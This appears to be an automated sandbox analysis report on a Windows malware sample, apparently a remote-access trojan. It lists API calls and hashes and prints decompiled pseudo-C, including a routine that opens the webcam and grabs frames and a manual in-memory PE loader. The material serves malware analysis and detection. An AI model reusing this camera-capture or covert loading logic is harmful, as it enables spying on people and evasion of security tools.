                                                                                                • Opcode Fuzzy Hash: 2d9afaaf9e3e870e82b71fd5ca7069e492c1f110bd892313dd017f26f82a3c5b
                                                                                                • Instruction Fuzzy Hash: 7AF0C8718007107BDB103BB59C0EA6B7B98EB42355F40056FF842516E2D5758490CF5A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0043DE64,00000000,?,0043DE04,00000000,004692A8,0000000C,0043DF17,00000000,00000002), ref: 0043DE8F
                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0043DEA2
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,0043DE64,00000000,?,0043DE04,00000000,004692A8,0000000C,0043DF17,00000000,00000002), ref: 0043DEC5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                • API String ID: 4061214504-1276376045
                                                                                                • Opcode ID: 7af1b8489912adde396c70bbbcc49f345a6f339c82104cc0313c135778c6bdce
                                                                                                • Instruction ID: 3078402fde7eea089401c54d00f02f942a697a84336c48599992c4ccec9add49
                                                                                                • Opcode Fuzzy Hash: 7af1b8489912adde396c70bbbcc49f345a6f339c82104cc0313c135778c6bdce
                                                                                                • Instruction Fuzzy Hash: B5F0A431A00608FBCB119B90EC09B9EBFB4EF58B16F104069FC05A6291DF349D84CA98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 86%
                                                                                                			E004170FB(WCHAR* __ecx, void* __edx) {
                                                                                                				void* __edi;
                                                                                                				void* _t7;
                                                                                                				void* _t12;
                                                                                                				WCHAR* _t14;
                                                                                                				void* _t16;
                                                                                                
                                                                                                				_t17 = _t16 - 0x18;
                                                                                                				_t14 = __ecx;
                                                                                                				E00402076(_t7, _t16 - 0x18, "Alarm triggered");
                                                                                                				E00402076(_t7, _t17 - 0x18, "!");
                                                                                                				E00417670(_t7, _t12);
                                                                                                				PlaySoundW(_t14, GetModuleHandleA(0), 0x20009);
                                                                                                				Sleep(0x2710);
                                                                                                				return PlaySoundW(0, 0, 0);
                                                                                                			}

                                                                                                APIs
                                                                                                  • Part of subcall function 00417670: GetLocalTime.KERNEL32(00000000), ref: 0041768A
                                                                                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041712D
                                                                                                • PlaySoundW.WINMM(00000000,00000000), ref: 0041713B
                                                                                                • Sleep.KERNEL32(00002710), ref: 00417142
                                                                                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041714B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                • String ID: Alarm triggered
                                                                                                • API String ID: 614609389-2816303416
                                                                                                • Opcode ID: 62e353c317bc57baaa5e3695c25239c50f512b2745c4d5b14febfbc299d0b12c
                                                                                                • Instruction ID: 029b799d6ce9f9b414df5b6a63bde51230d83b0af7215cd46c917e2105275d48
                                                                                                • Opcode Fuzzy Hash: 62e353c317bc57baaa5e3695c25239c50f512b2745c4d5b14febfbc299d0b12c
                                                                                                • Instruction Fuzzy Hash: FDE01226B40220779510376A6D0FD6F3D29DAC2B65B01006EFA0556196DD950851C6FB
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 96%
                                                                                                			E004396EA(void* __ebx, void* __edx, void* __edi, void* __esi, char* _a4, short* _a8, int _a12, intOrPtr _a16) {
                                                                                                				signed int _v8;
                                                                                                				char _v16;
                                                                                                				int _v20;
                                                                                                				int _v24;
                                                                                                				char* _v28;
                                                                                                				int _v32;
                                                                                                				char _v36;
                                                                                                				intOrPtr _v44;
                                                                                                				char _v48;
                                                                                                				signed int _t59;
                                                                                                				char* _t61;
                                                                                                				intOrPtr _t63;
                                                                                                				int _t64;
                                                                                                				intOrPtr* _t65;
                                                                                                				signed int _t68;
                                                                                                				intOrPtr* _t71;
                                                                                                				short* _t73;
                                                                                                				int _t74;
                                                                                                				int _t76;
                                                                                                				char _t78;
                                                                                                				short* _t83;
                                                                                                				short _t85;
                                                                                                				int _t91;
                                                                                                				int _t93;
                                                                                                				char* _t98;
                                                                                                				int _t103;
                                                                                                				char* _t105;
                                                                                                				void* _t106;
                                                                                                				intOrPtr _t108;
                                                                                                				intOrPtr _t109;
                                                                                                				int _t110;
                                                                                                				short* _t113;
                                                                                                				int _t114;
                                                                                                				int _t116;
                                                                                                				signed int _t117;
                                                                                                
                                                                                                				_t106 = __edx;
                                                                                                				_t59 =  *0x46c00c; // 0x4cc22724
                                                                                                				_v8 = _t59 ^ _t117;
                                                                                                				_t61 = _a4;
                                                                                                				_t91 = _a12;
                                                                                                				_t116 = 0;
                                                                                                				_v28 = _t61;
                                                                                                				_v20 = 0;
                                                                                                				_t113 = _a8;
                                                                                                				_v24 = _t113;
                                                                                                				if(_t61 == 0 || _t91 != 0) {
                                                                                                					if(_t113 != 0) {
                                                                                                						E00436267(_t91,  &_v48, _t106, _a16);
                                                                                                						_t98 = _v28;
                                                                                                						if(_t98 == 0) {
                                                                                                							_t63 = _v44;
                                                                                                							if( *((intOrPtr*)(_t63 + 0xa8)) != _t116) {
                                                                                                								_t64 = WideCharToMultiByte( *(_t63 + 8), _t116, _t113, 0xffffffff, _t116, _t116, _t116,  &_v20);
                                                                                                								if(_t64 == 0 || _v20 != _t116) {
                                                                                                									L55:
                                                                                                									_t65 = E00438932();
                                                                                                									_t114 = _t113 | 0xffffffff;
                                                                                                									 *_t65 = 0x2a;
                                                                                                									goto L56;
                                                                                                								} else {
                                                                                                									_t53 = _t64 - 1; // -1
                                                                                                									_t114 = _t53;
                                                                                                									L56:
                                                                                                									if(_v36 != 0) {
                                                                                                										 *(_v48 + 0x350) =  *(_v48 + 0x350) & 0xfffffffd;
                                                                                                									}
                                                                                                									goto L59;
                                                                                                								}
                                                                                                							}
                                                                                                							_t68 =  *_t113 & 0x0000ffff;
                                                                                                							if(_t68 == 0) {
                                                                                                								L51:
                                                                                                								_t114 = _t116;
                                                                                                								goto L56;
                                                                                                							}
                                                                                                							while(_t68 <= 0xff) {
                                                                                                								_t113 =  &(_t113[1]);
                                                                                                								_t116 = _t116 + 1;
                                                                                                								_t68 =  *_t113 & 0x0000ffff;
                                                                                                								if(_t68 != 0) {
                                                                                                									continue;
                                                                                                								}
                                                                                                								goto L51;
                                                                                                							}
                                                                                                							goto L55;
                                                                                                						}
                                                                                                						_t108 = _v44;
                                                                                                						if( *((intOrPtr*)(_t108 + 0xa8)) != _t116) {
                                                                                                							if( *((intOrPtr*)(_t108 + 4)) != 1) {
                                                                                                								_t114 = WideCharToMultiByte( *(_t108 + 8), _t116, _t113, 0xffffffff, _t98, _t91, _t116,  &_v20);
                                                                                                								if(_t114 == 0) {
                                                                                                									if(_v20 != _t116 || GetLastError() != 0x7a) {
                                                                                                										L45:
                                                                                                										_t71 = E00438932();
                                                                                                										_t116 = _t116 | 0xffffffff;
                                                                                                										 *_t71 = 0x2a;
                                                                                                										goto L51;
                                                                                                									} else {
                                                                                                										if(_t91 == 0) {
                                                                                                											goto L56;
                                                                                                										}
                                                                                                										_t73 = _v24;
                                                                                                										while(1) {
                                                                                                											_t109 = _v44;
                                                                                                											_t103 =  *(_t109 + 4);
                                                                                                											if(_t103 > 5) {
                                                                                                												_t103 = 5;
                                                                                                											}
                                                                                                											_t74 = WideCharToMultiByte( *(_t109 + 8), _t116, _t73, 1,  &_v16, _t103, _t116,  &_v20);
                                                                                                											_t93 = _a12;
                                                                                                											_t110 = _t74;
                                                                                                											if(_t110 == 0 || _v20 != _t116 || _t110 < 0 || _t110 > 5) {
                                                                                                												goto L55;
                                                                                                											}
                                                                                                											if(_t110 + _t114 > _t93) {
                                                                                                												goto L56;
                                                                                                											}
                                                                                                											_t76 = _t116;
                                                                                                											_v32 = _t76;
                                                                                                											if(_t110 <= 0) {
                                                                                                												L43:
                                                                                                												_t73 = _v24 + 2;
                                                                                                												_v24 = _t73;
                                                                                                												if(_t114 < _t93) {
                                                                                                													continue;
                                                                                                												}
                                                                                                												goto L56;
                                                                                                											}
                                                                                                											_t105 = _v28;
                                                                                                											while(1) {
                                                                                                												_t78 =  *((intOrPtr*)(_t117 + _t76 - 0xc));
                                                                                                												 *((char*)(_t105 + _t114)) = _t78;
                                                                                                												if(_t78 == 0) {
                                                                                                													goto L56;
                                                                                                												}
                                                                                                												_t76 = _v32 + 1;
                                                                                                												_t114 = _t114 + 1;
                                                                                                												_v32 = _t76;
                                                                                                												if(_t76 < _t110) {
                                                                                                													continue;
                                                                                                												}
                                                                                                												goto L43;
                                                                                                											}
                                                                                                											goto L56;
                                                                                                										}
                                                                                                										goto L55;
                                                                                                									}
                                                                                                								}
                                                                                                								if(_v20 != _t116) {
                                                                                                									goto L45;
                                                                                                								}
                                                                                                								_t28 = _t114 - 1; // -1
                                                                                                								_t116 = _t28;
                                                                                                								goto L51;
                                                                                                							}
                                                                                                							if(_t91 == 0) {
                                                                                                								L21:
                                                                                                								_t116 = WideCharToMultiByte( *(_t108 + 8), _t116, _t113, _t91, _t98, _t91, _t116,  &_v20);
                                                                                                								if(_t116 == 0 || _v20 != 0) {
                                                                                                									goto L45;
                                                                                                								} else {
                                                                                                									if(_v28[_t116 - 1] == 0) {
                                                                                                										_t116 = _t116 - 1;
                                                                                                									}
                                                                                                									goto L51;
                                                                                                								}
                                                                                                							}
                                                                                                							_t83 = _t113;
                                                                                                							_v24 = _t91;
                                                                                                							while( *_t83 != _t116) {
                                                                                                								_t83 =  &(_t83[1]);
                                                                                                								_t16 =  &_v24;
                                                                                                								 *_t16 = _v24 - 1;
                                                                                                								if( *_t16 != 0) {
                                                                                                									continue;
                                                                                                								}
                                                                                                								break;
                                                                                                							}
                                                                                                							if(_v24 != _t116 &&  *_t83 == _t116) {
                                                                                                								_t91 = (_t83 - _t113 >> 1) + 1;
                                                                                                							}
                                                                                                							goto L21;
                                                                                                						}
                                                                                                						if(_t91 == 0) {
                                                                                                							goto L51;
                                                                                                						}
                                                                                                						while( *_t113 <= 0xff) {
                                                                                                							_t98[_t116] =  *_t113;
                                                                                                							_t85 =  *_t113;
                                                                                                							_t113 =  &(_t113[1]);
                                                                                                							if(_t85 == 0) {
                                                                                                								goto L51;
                                                                                                							}
                                                                                                							_t116 = _t116 + 1;
                                                                                                							if(_t116 < _t91) {
                                                                                                								continue;
                                                                                                							}
                                                                                                							goto L51;
                                                                                                						}
                                                                                                						goto L45;
                                                                                                					}
                                                                                                					 *((intOrPtr*)(E00438932())) = 0x16;
                                                                                                					E00437709();
                                                                                                					goto L59;
                                                                                                				} else {
                                                                                                					L59:
                                                                                                					return E00430A5B(_v8 ^ _t117);
                                                                                                				}
                                                                                                			}







































                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8d4be186497c31324fbecd1428ab1a8062156cfd5fe5274e898eb7c5a7b29789
                                                                                                • Instruction ID: 065f0bc0dede0ecb3b837fc5a7bcf81a28c29dc1b15ba8dd1f928077b441424a
                                                                                                • Opcode Fuzzy Hash: 8d4be186497c31324fbecd1428ab1a8062156cfd5fe5274e898eb7c5a7b29789
                                                                                                • Instruction Fuzzy Hash: 5071D071900216DBCB21DF59C884ABFBB74EF4A360F24226FE46167390D7B48D41CBA9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 68%
                                                                                                			E00404467(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, char** _a8, signed int _a12) {
                                                                                                				char _v8;
                                                                                                				void* _v40;
                                                                                                				char _v44;
                                                                                                				char _v52;
                                                                                                				char _v56;
                                                                                                				char _v60;
                                                                                                				char _v76;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				void* _t26;
                                                                                                				char** _t28;
                                                                                                				intOrPtr* _t30;
                                                                                                				char* _t38;
                                                                                                				intOrPtr _t48;
                                                                                                				signed int _t57;
                                                                                                				signed int _t59;
                                                                                                				char* _t62;
                                                                                                				void* _t66;
                                                                                                				signed int _t67;
                                                                                                				void* _t69;
                                                                                                				signed int _t78;
                                                                                                				void* _t81;
                                                                                                				void* _t129;
                                                                                                				signed int _t131;
                                                                                                				signed int _t133;
                                                                                                				signed int _t134;
                                                                                                				signed int _t135;
                                                                                                				signed int _t136;
                                                                                                				signed int _t137;
                                                                                                				signed int _t141;
                                                                                                				void* _t144;
                                                                                                				void* _t145;
                                                                                                				intOrPtr* _t146;
                                                                                                
                                                                                                				_push(__edi);
                                                                                                				_t125 = _a8;
                                                                                                				_t129 = __ecx;
                                                                                                				_t26 = E004027CC(__ecx, _a8);
                                                                                                				_t81 = _t129;
                                                                                                				_t152 = _t26;
                                                                                                				if(_t26 == 0) {
                                                                                                					_push(__ebx);
                                                                                                					E004028AB(_t81, __edx, 0);
                                                                                                					_t28 = E00402231();
                                                                                                					_t78 = _a12;
                                                                                                					_a8 = _t28;
                                                                                                					_t120 =  *_t28;
                                                                                                					__eflags =  !_t120 - _t78;
                                                                                                					if( !_t120 <= _t78) {
                                                                                                						E004028CA(_t129);
                                                                                                						asm("int3");
                                                                                                						_push(_t129);
                                                                                                						_t30 = E00401F87( &_v8);
                                                                                                						E00404287( &_v8,  &_v44, 4, 0xffffffff);
                                                                                                						_t144 = (_t141 & 0xfffffff8) - 0xc;
                                                                                                						E004020DE(_t78, _t144, _t120, __eflags, 0x46e250);
                                                                                                						_t145 = _t144 - 0x18;
                                                                                                						E004020DE(_t78, _t145, _t120, __eflags,  &_v60);
                                                                                                						E00417E68( &_v76, _t120);
                                                                                                						_t146 = _t145 + 0x30;
                                                                                                						_t131 =  *_t30 - 0x3c;
                                                                                                						__eflags = _t131;
                                                                                                						if(__eflags == 0) {
                                                                                                							E00401E3B( &_v52, _t120, __eflags, 0);
                                                                                                							_t38 = E0040247B();
                                                                                                							E00401F87(E00401E3B( &_v56, _t120, __eflags, 0));
                                                                                                							_t120 = _t38;
                                                                                                							_t133 = E0040F6D9();
                                                                                                							__eflags = _t133;
                                                                                                							if(_t133 != 0) {
                                                                                                								 *0x46dac4 = E0040F96F(_t133, "OpenCamera");
                                                                                                								 *0x46dac0 = E0040F96F(_t133, "CloseCamera");
                                                                                                								_t48 = E0040F96F(_t133, "GetFrame");
                                                                                                								_t120 = "FreeFrame";
                                                                                                								 *0x46dac8 = _t48;
                                                                                                								 *0x46dabc = E0040F96F(_t133, "FreeFrame");
                                                                                                								 *0x46daaa = 1;
                                                                                                								E004020DE(_t78, _t146 - 0x18, "FreeFrame", __eflags, 0x46e1b8);
                                                                                                								_push(0x1b);
                                                                                                								goto L23;
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t134 = _t131 - 1;
                                                                                                							__eflags = _t134;
                                                                                                							if(_t134 == 0) {
                                                                                                								__eflags =  *0x46da77;
                                                                                                								if(__eflags != 0) {
                                                                                                									goto L20;
                                                                                                								}
                                                                                                							} else {
                                                                                                								_t135 = _t134 - 1;
                                                                                                								__eflags = _t135;
                                                                                                								if(_t135 == 0) {
                                                                                                									 *0x46dac0();
                                                                                                									 *0x46da77 = 0;
                                                                                                								} else {
                                                                                                									_t136 = _t135 - 1;
                                                                                                									__eflags = _t136;
                                                                                                									if(_t136 == 0) {
                                                                                                										_t57 =  *0x46dac4();
                                                                                                										 *0x46da77 = _t57;
                                                                                                										__eflags = _t57;
                                                                                                										if(__eflags == 0) {
                                                                                                											goto L15;
                                                                                                										} else {
                                                                                                											L20:
                                                                                                											_t120 = E004374E4(_t52, E00401F87(E00401E3B( &_v52, _t120, __eflags, 0)));
                                                                                                											E004046FF(_a4, _t54, __eflags);
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t137 = _t136 - 1;
                                                                                                										__eflags = _t137;
                                                                                                										if(_t137 == 0) {
                                                                                                											_t59 =  *0x46dac4();
                                                                                                											 *0x46da77 = _t59;
                                                                                                											__eflags = _t59;
                                                                                                											if(__eflags == 0) {
                                                                                                												L15:
                                                                                                												E004020DE(_t78, _t146 - 0x18, _t120, __eflags, 0x46e1b8);
                                                                                                												_push(0x41);
                                                                                                												L23:
                                                                                                												E00404BB7(_t78, _a4, _t120, __eflags);
                                                                                                											} else {
                                                                                                												_t62 = E004374E4(_t60, E00401F87(E00401E3B( &_v52, _t120, __eflags, _t137)));
                                                                                                												 *_t146 = 0x3e8;
                                                                                                												Sleep(??);
                                                                                                												_t120 = _t62;
                                                                                                												E004046FF(_a4, _t62, __eflags);
                                                                                                												 *0x46dac0();
                                                                                                											}
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                						E00401E66( &_v52, _t120);
                                                                                                						E00401FB9();
                                                                                                						E00401FB9();
                                                                                                						__eflags = 0;
                                                                                                						return 0;
                                                                                                					} else {
                                                                                                						_t65 =  &(_t120[_t78]);
                                                                                                						_a12 =  &(_t120[_t78]);
                                                                                                						__eflags = _t78;
                                                                                                						if(__eflags != 0) {
                                                                                                							_push(0);
                                                                                                							_t67 = E00402807(_t78, _t129, _t120, _t125, __eflags, _t65);
                                                                                                							__eflags = _t67;
                                                                                                							if(_t67 != 0) {
                                                                                                								_push( *_a8);
                                                                                                								_t69 = E0040221B(_t129);
                                                                                                								E0040159F(E0040221B(_t129) + _t78 * 2, _t69);
                                                                                                								_push(_t78);
                                                                                                								E0040158B(E0040221B(_t129), _t125);
                                                                                                								E0040287A(_a12);
                                                                                                							}
                                                                                                						}
                                                                                                						_t66 = _t129;
                                                                                                						goto L7;
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t66 = E004035B1(__ebx, _t129, __edx, _t125 - E0040221B(_t81) >> 1, _t129, _t152, _t81, _t129, _t125 - E0040221B(_t81) >> 1, _a12);
                                                                                                					L7:
                                                                                                					return _t66;
                                                                                                				}
                                                                                                			}





































                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00000000,?), ref: 004045BC
                                                                                                  • Part of subcall function 004046FF: __EH_prolog.LIBCMT ref: 00404704
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: H_prologSleep
                                                                                                • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                                                                                • API String ID: 3469354165-3547787478
                                                                                                • Opcode ID: 9a7fb9ab8d5fe1e9b19520489653bd00a85e42315cfc21318e12cdca55488016
                                                                                                • Instruction ID: 05ece077fded5990d91df96ac5666eaa8e0806417524fa1e4efd2b664c8b215c
                                                                                                • Opcode Fuzzy Hash: 9a7fb9ab8d5fe1e9b19520489653bd00a85e42315cfc21318e12cdca55488016
                                                                                                • Instruction Fuzzy Hash: F651D6B1B0421067CA14BB76C85AA6E37659BC1318F00053FF906BB7E2EF7D8905879E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 80%
                                                                                                			E0040F6E5(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
                                                                                                				intOrPtr _v8;
                                                                                                				signed int _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				intOrPtr _v20;
                                                                                                				intOrPtr _v52;
                                                                                                				char _v56;
                                                                                                				signed int _t59;
                                                                                                				signed int _t61;
                                                                                                				void* _t64;
                                                                                                				void* _t67;
                                                                                                				signed int _t72;
                                                                                                				void* _t78;
                                                                                                				signed int _t79;
                                                                                                				void* _t80;
                                                                                                				signed int _t82;
                                                                                                				signed int _t83;
                                                                                                				signed int _t85;
                                                                                                				signed int _t87;
                                                                                                				signed int _t88;
                                                                                                				signed int _t91;
                                                                                                				void* _t92;
                                                                                                				signed int _t93;
                                                                                                				intOrPtr* _t96;
                                                                                                				signed int _t98;
                                                                                                				signed int _t113;
                                                                                                				void* _t115;
                                                                                                				signed int _t118;
                                                                                                				void* _t124;
                                                                                                				signed int _t126;
                                                                                                				intOrPtr _t128;
                                                                                                				signed int _t129;
                                                                                                				void* _t130;
                                                                                                				signed int _t131;
                                                                                                				void* _t132;
                                                                                                				void* _t133;
                                                                                                
                                                                                                				_t115 = 0x40;
                                                                                                				_v16 = __edx;
                                                                                                				_v8 = __ecx;
                                                                                                				_t124 = 0;
                                                                                                				if(E0040F188(__edx, _t115) == 0) {
                                                                                                					L33:
                                                                                                					return 0;
                                                                                                				}
                                                                                                				if( *((intOrPtr*)(__ecx)) == 0x5a4d) {
                                                                                                					_t59 = E0040F188(__edx,  *((intOrPtr*)(__ecx + 0x3c)) + 0xf8);
                                                                                                					__eflags = _t59;
                                                                                                					if(_t59 == 0) {
                                                                                                						goto L33;
                                                                                                					}
                                                                                                					_t96 =  *((intOrPtr*)(__ecx + 0x3c)) + __ecx;
                                                                                                					__eflags =  *_t96 - 0x4550;
                                                                                                					if( *_t96 != 0x4550) {
                                                                                                						goto L2;
                                                                                                					}
                                                                                                					__eflags =  *((intOrPtr*)(_t96 + 4)) - 0x14c;
                                                                                                					if( *((intOrPtr*)(_t96 + 4)) != 0x14c) {
                                                                                                						goto L2;
                                                                                                					}
                                                                                                					__eflags =  *(_t96 + 0x38) & 0x00000001;
                                                                                                					if(( *(_t96 + 0x38) & 0x00000001) != 0) {
                                                                                                						goto L2;
                                                                                                					}
                                                                                                					_t118 =  *(_t96 + 6) & 0x0000ffff;
                                                                                                					_t61 =  *(_t96 + 0x14) & 0x0000ffff;
                                                                                                					__eflags = _t118;
                                                                                                					if(_t118 == 0) {
                                                                                                						L14:
                                                                                                						__imp__GetNativeSystemInfo( &_v56);
                                                                                                						_t128 = E0040F177( *((intOrPtr*)(_t96 + 0x50)), _v52);
                                                                                                						_v20 = _t128;
                                                                                                						_t64 = E0040F177(_t124, _v52);
                                                                                                						__eflags = _t128 - _t64;
                                                                                                						if(_t128 != _t64) {
                                                                                                							goto L2;
                                                                                                						}
                                                                                                						_push(0);
                                                                                                						_t129 = E0040F681( *((intOrPtr*)(_t96 + 0x34)), _t128, 0x3000, 4);
                                                                                                						_t133 = _t132 + 0x14;
                                                                                                						_v12 = _t129;
                                                                                                						__eflags = _t129;
                                                                                                						if(_t129 != 0) {
                                                                                                							L18:
                                                                                                							_t67 = HeapAlloc(GetProcessHeap(), 8, 0x40);
                                                                                                							_t126 = _t67;
                                                                                                							__eflags = _t126;
                                                                                                							if(_t126 != 0) {
                                                                                                								 *(_t126 + 4) = _t129;
                                                                                                								 *(_t126 + 0x34) =  *(_t126 + 0x34) & 0x00000000;
                                                                                                								 *((intOrPtr*)(_t126 + 0x1c)) = E0040F681;
                                                                                                								 *(_t126 + 0x14) = ( *(_t96 + 0x16) & 0x0000ffff) >> 0x0000000d & 0x00000001;
                                                                                                								 *((intOrPtr*)(_t126 + 0x20)) = E0040F698;
                                                                                                								 *((intOrPtr*)(_t126 + 0x24)) = E0040F6AC;
                                                                                                								 *((intOrPtr*)(_t126 + 0x28)) = E0040F6BA;
                                                                                                								 *((intOrPtr*)(_t126 + 0x2c)) = E0040F6CB;
                                                                                                								 *((intOrPtr*)(_t126 + 0x3c)) = _v52;
                                                                                                								_t72 = E0040F188(_v16,  *((intOrPtr*)(_t96 + 0x54)));
                                                                                                								__eflags = _t72;
                                                                                                								if(_t72 == 0) {
                                                                                                									L32:
                                                                                                									E0040FA85(_t126);
                                                                                                									goto L33;
                                                                                                								}
                                                                                                								_push(0);
                                                                                                								_t130 = E0040F681(_t129,  *((intOrPtr*)(_t96 + 0x54)), 0x1000, 4);
                                                                                                								E00433360(_t130, _v8,  *((intOrPtr*)(_t96 + 0x54)));
                                                                                                								_t43 = _v8 + 0x3c; // 0x4540d0
                                                                                                								_t78 =  *_t43 + _t130;
                                                                                                								_t131 = _v12;
                                                                                                								 *_t126 = _t78;
                                                                                                								 *((intOrPtr*)(_t78 + 0x34)) = _t131;
                                                                                                								_t79 = E0040F19B(_v8, _v16, _t96, _t126);
                                                                                                								__eflags = _t79;
                                                                                                								if(_t79 == 0) {
                                                                                                									goto L32;
                                                                                                								}
                                                                                                								_t80 =  *_t126;
                                                                                                								_t123 =  *((intOrPtr*)(_t80 + 0x34)) ==  *((intOrPtr*)(_t96 + 0x34));
                                                                                                								__eflags =  *((intOrPtr*)(_t80 + 0x34)) ==  *((intOrPtr*)(_t96 + 0x34));
                                                                                                								if( *((intOrPtr*)(_t80 + 0x34)) ==  *((intOrPtr*)(_t96 + 0x34))) {
                                                                                                									_t98 = 1;
                                                                                                									__eflags = 1;
                                                                                                									 *((intOrPtr*)(_t126 + 0x18)) = 1;
                                                                                                								} else {
                                                                                                									 *((intOrPtr*)(_t126 + 0x18)) = E0040F497(_t126, _t123);
                                                                                                									_t98 = 1;
                                                                                                								}
                                                                                                								__eflags = E0040F53C(_t126);
                                                                                                								if(__eflags != 0) {
                                                                                                									_t82 = E0040F342(_t126, __eflags);
                                                                                                									__eflags = _t82;
                                                                                                									if(_t82 == 0) {
                                                                                                										goto L32;
                                                                                                									}
                                                                                                									_t83 = E0040F466(_t126);
                                                                                                									__eflags = _t83;
                                                                                                									if(_t83 == 0) {
                                                                                                										goto L32;
                                                                                                									}
                                                                                                									_t85 =  *( *_t126 + 0x28);
                                                                                                									__eflags = _t85;
                                                                                                									if(_t85 == 0) {
                                                                                                										_t54 = _t126 + 0x38;
                                                                                                										 *_t54 =  *(_t126 + 0x38) & 0x00000000;
                                                                                                										__eflags =  *_t54;
                                                                                                										L38:
                                                                                                										return _t126;
                                                                                                									}
                                                                                                									_t87 = _t85 + _t131;
                                                                                                									__eflags =  *(_t126 + 0x14);
                                                                                                									if( *(_t126 + 0x14) == 0) {
                                                                                                										 *(_t126 + 0x38) = _t87;
                                                                                                										goto L38;
                                                                                                									}
                                                                                                									_t88 =  *_t87(_t131, _t98, 0);
                                                                                                									__eflags = _t88;
                                                                                                									if(_t88 != 0) {
                                                                                                										 *((intOrPtr*)(_t126 + 0x10)) = _t98;
                                                                                                										goto L38;
                                                                                                									}
                                                                                                									SetLastError(0x45a);
                                                                                                								}
                                                                                                								goto L32;
                                                                                                							}
                                                                                                							_push(_t67);
                                                                                                							E0040F698(_t129, _t67, 0x8000);
                                                                                                							L17:
                                                                                                							_push(0xe);
                                                                                                							L3:
                                                                                                							SetLastError();
                                                                                                							goto L33;
                                                                                                						}
                                                                                                						_push(0);
                                                                                                						_t91 = E0040F681(0, _v20, 0x3000, 4);
                                                                                                						_t129 = _t91;
                                                                                                						_v12 = _t91;
                                                                                                						_t133 = _t133 + 0x14;
                                                                                                						__eflags = _t129;
                                                                                                						if(_t129 != 0) {
                                                                                                							goto L18;
                                                                                                						}
                                                                                                						goto L17;
                                                                                                					}
                                                                                                					_t113 = _t96 + 0x24 + _t61;
                                                                                                					__eflags = _t113;
                                                                                                					do {
                                                                                                						__eflags =  *(_t113 + 4);
                                                                                                						_t92 =  *_t113;
                                                                                                						if( *(_t113 + 4) != 0) {
                                                                                                							_t93 = _t92 +  *(_t113 + 4);
                                                                                                							__eflags = _t93;
                                                                                                						} else {
                                                                                                							_t93 = _t92 +  *(_t96 + 0x38);
                                                                                                						}
                                                                                                						__eflags = _t93 - _t124;
                                                                                                						_t124 = (_t93 > _t124) ? _t93 : _t124;
                                                                                                						_t113 = _t113 + 0x28;
                                                                                                						_t118 = _t118 - 1;
                                                                                                						__eflags = _t118;
                                                                                                					} while (_t118 != 0);
                                                                                                					goto L14;
                                                                                                				}
                                                                                                				L2:
                                                                                                				_push(0xc1);
                                                                                                				goto L3;
                                                                                                			}






































                                                                                                0x00000000
                                                                                                0x0040f929
                                                                                                0x0040f913
                                                                                                0x0040f913
                                                                                                0x00000000
